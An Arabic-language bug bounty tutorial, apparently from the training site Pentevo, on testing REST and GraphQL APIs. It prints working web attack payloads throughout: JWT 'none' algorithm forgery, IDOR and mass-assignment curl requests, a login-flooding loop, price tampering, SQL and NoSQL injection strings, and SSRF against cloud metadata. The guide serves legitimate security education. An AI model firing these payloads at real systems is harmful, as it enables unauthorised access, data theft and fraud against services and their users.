اختبار اختراق APIs: الدليل العملي لـ Bug Bounty في 2026
4 أكتوبر 2026 · بواسطة Pentevo
APIs هي كنز Bug Bounty في 2026. كل تطبيق موبايل، كل SaaS platform، كل ميزة حديثة تستخدم API. ومعظمها لديه ثغرات IDOR وAuthentication issues لم تُكتشف بعد.
فهم أنواع APIs
REST API
GET /api/v1/users/{id}
POST /api/v1/orders
PUT /api/v1/profile/{id}
DELETE /api/v1/posts/{id}
Response: JSON عادةً
Auth: Bearer Token أو API Key في Header
GraphQL
# Query
query {
user(id: "123") { email, orders { total } }
}
# Mutation
mutation {
updateProfile(email: "new@email.com") { success }
}
Endpoint ثابت: /graphql أو /api/graphql
gRPC
يستخدم Protocol Buffers (binary)
أصعب في الاختبار — يحتاج أدوات خاصة مثل grpcurl
الخطوة 1: اكتشاف API Endpoints
# من JS files
python3 LinkFinder/linkfinder.py -i https://example.com -o cli
# من Wayback Machine
gau example.com | grep "api" | sort -u
# Directory Fuzzing للـ API
ffuf -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
-u https://example.com/api/FUZZ \
-fc 404 \
-H "Authorization: Bearer YOUR_TOKEN"
# فحص إصدارات قديمة
ffuf -w versions.txt \
-u https://example.com/FUZZ/users \
-fc 404
# Wordlist: api, v1, v2, v3, beta, internal, private
الخطوة 2: Authentication Testing
Missing Authentication
# هل يمكن الوصول بدون token؟
curl https://api.example.com/v1/users
curl https://api.example.com/v1/admin/users
# هل الـ API key يُقبل بطرق مختلفة؟
curl -H "X-API-Key: TOKEN" https://api.example.com/data
curl "https://api.example.com/data?api_key=TOKEN"
curl "https://api.example.com/data?token=TOKEN"
JWT Testing
# Decode JWT (بدون التحقق)
echo "eyJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiYWRtaW4ifQ.xxx" | \
base64 -d 2>/dev/null || true
# اختبار Algorithm Confusion (None Algorithm)
# غيّر alg إلى "none" والـ signature لفراغ
{
"alg": "none",
"typ": "JWT"
}
{
"user": "admin",
"role": "admin"
}
# Encoded: base64url(header).base64url(payload).
الخطوة 3: IDOR في APIs
# اكتشاف IDs
# راقب كل ID في الـ Responses
# عادةً: user_id, order_id, account_id, file_id
# اختبار التبادل
curl -H "Authorization: Bearer ATTACKER_TOKEN" \
https://api.example.com/v1/orders/VICTIM_ORDER_ID
# اختبار Method Tampering
# GET → PUT → DELETE
curl -X DELETE \
-H "Authorization: Bearer ATTACKER_TOKEN" \
https://api.example.com/v1/users/ANOTHER_USER_ID
# اختبار Mass Assignment
curl -X PATCH \
-H "Content-Type: application/json" \
-H "Authorization: Bearer TOKEN" \
-d '{"email":"new@email.com","role":"admin","is_premium":true}' \
https://api.example.com/v1/profile
الخطوة 4: GraphQL Security Testing
# اكتشاف Schema (Introspection)
query {
__schema {
types {
name
fields { name }
}
}
}
# اكتشاف Mutations المتاحة
query {
__schema {
mutationType {
fields { name, args { name } }
}
}
}
# IDOR في GraphQL
query {
user(id: "VICTIM_ID") {
email, phone, privateData
}
}
# Batch Attack (DoS أو Rate Limit Bypass)
[
{"query": "query { user(id: 1) { email } }"},
{"query": "query { user(id: 2) { email } }"},
...hundreds more
]
الخطوة 5: Rate Limiting وBusiness Logic
# اختبار Missing Rate Limiting
# ارسل 100 request في ثانية واحدة
for i in {1..100}; do
curl -s -o /dev/null -w "%{http_code}\n" \
-X POST https://api.example.com/login \
-d '{"username":"admin","password":"test"}' &
done
wait
# إذا لم يُحجب = Missing Rate Limiting
# Price Manipulation
curl -X POST https://api.example.com/checkout \
-d '{"item_id":1,"quantity":1,"price":0.01}' # تغيير السعر!
# Negative Quantity
curl -X POST https://api.example.com/cart \
-d '{"item_id":1,"quantity":-5}' # شراء بكميات سالبة = استرداد مال؟
الخطوة 6: Injection في APIs
# SQL Injection في Parameters
curl "https://api.example.com/search?q=test'" -v
curl "https://api.example.com/users?id=1 OR 1=1--"
# NoSQL Injection (MongoDB)
curl -X POST https://api.example.com/login \
-H "Content-Type: application/json" \
-d '{"username":{"$gt":""},"password":{"$gt":""}}'
# SSRF في APIs
curl -X POST https://api.example.com/webhook \
-d '{"url":"http://169.254.169.254/latest/meta-data/"}' # AWS metadata
أدوات متخصصة في API Testing
# Arjun - اكتشاف Hidden Parameters
pip3 install arjun
arjun -u https://api.example.com/endpoint
# kiterunner - API Discovery
kr brute https://api.example.com -w routes-large.kite
# graphw00f - GraphQL Fingerprinting
python3 graphw00f.py -d -t https://example.com/graphql
الخلاصة
APIs هي الحقل الأكثر خصوبة في Bug Bounty الحالي. ركّز على IDOR وMass Assignment وAuthentication Issues. كل ميزة جديدة في التطبيق = API جديدة = فرصة جديدة. وثّق كل endpoint تكتشفه في Burp Site Map وعُد إليه لاحقًا بأدوات مختلفة.
الأسئلة الشائعة
لماذا APIs هي الهدف الأفضل في Bug Bounty الحالي؟
لأن معظم التطبيقات الحديثة تعتمد على APIs وكثيرها تفتقر للتوثيق الجيد. APIs تحمل ثغرات IDOR وAuthentication Bypass وMass Assignment بشكل شائع جدًا.
ما الأدوات الأساسية لاختبار APIs؟
Burp Suite (لاعتراض وتعديل الطلبات)، Postman (لتنظيم الـ requests)، ffuf (للـ Fuzzing)، وArjun (لاكتشاف Hidden Parameters).
ما أكثر ثغرات APIs شيوعًا في Bug Bounty؟
IDOR هي الأكثر انتشارًا. تليها: Broken Authentication، Mass Assignment، Excessive Data Exposure، وMissing Rate Limiting.
مقالات ذات صلة
كيف تكتب Writeup Bug Bounty يجذب القراء ويعزز سمعتك
دليل كتابة Writeups احترافية لثغرات Bug Bounty: البنية الصحيحة، كيف تقدّم الثغرة بإبداع، ولماذا Writeups تُضاعف دخلك وفرص عملك.
bug-bountyشرح Bugcrowd للمبتدئين: كيف تبدأ وتختار البرنامج الصحيح
دليل شامل لمنصة Bugcrowd: التسجيل، الفرق عن HackerOne، أفضل البرامج للمبتدئين، نظام Trust وPoints، وكيف تستفيد من Crowdstream.
bug-bountyثغرات Command Injection: من الاكتشاف إلى RCE الكامل
دليل شامل لثغرات OS Command Injection: كيف تعمل، أين تظهر، Payloads عملية، تقنيات Out-of-Band Detection، وكيف توثّقها في Bug Bounty.
bug-bountyثغرات CSRF: الدليل الشامل من الفهم إلى الاستغلال والمكافأة
كل ما تحتاج معرفته عن Cross-Site Request Forgery: كيف تعمل الثغرة، كيف تكتشفها، تقنيات Bypass للحمايات، وأمثلة حقيقية من Bug Bounty.
طبّق هذا عمليًا
أكاديمية Pentevo تحوّل هذه المفاهيم إلى دروس موجّهة وفيديوهات واختبارات — مجانًا.
ابدأ التعلّم مجانًا